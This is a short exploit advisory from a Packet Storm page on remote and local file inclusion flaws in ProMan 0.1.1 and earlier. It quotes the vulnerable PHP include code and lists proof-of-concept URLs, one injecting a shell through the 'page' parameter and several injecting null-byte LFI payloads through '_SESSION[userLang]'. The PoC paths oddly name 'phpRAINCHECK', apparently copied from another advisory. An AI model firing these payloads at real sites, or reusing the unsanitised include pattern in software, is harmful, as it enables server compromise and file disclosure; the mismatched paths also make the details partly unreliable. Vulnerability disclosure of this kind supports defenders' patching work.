ProMan versions 0.1.1 and below suffer from local file inclusion and remote file inclusion vulnerabilities.
27e2dfd1575e864c15fe921b18d182a7e90d773cd32dbdd2f46d5203f9a563c6##############################################################
##ProMan <= 0.1.1 Multiple File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/pman/files/
##############################################################
[RFI Code]
<?php
if (!($_GET['page']))
include('info.php');
else
include $_GET['page'].'.php';
?>
[LFI Code]
include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php');
if (!defined('PROMAN'))
pexit ($l['no hack']);
##############################################################
PoC RFI:
[phpRAINCHECK_path]/_center.php?page=[Shell]
##############################################################
PoC LFI:
[phpRAINCHECK_path]/elisttasks.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/managepmanagers.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/manageusers.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/helpfunc.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/managegroups.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/manageprocess.php?_SESSION[userLang]=[LFI%00]
[phpRAINCHECK_path]/manageusersgroups.php?_SESSION[userLang]=[LFI%00]
others...
##############################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed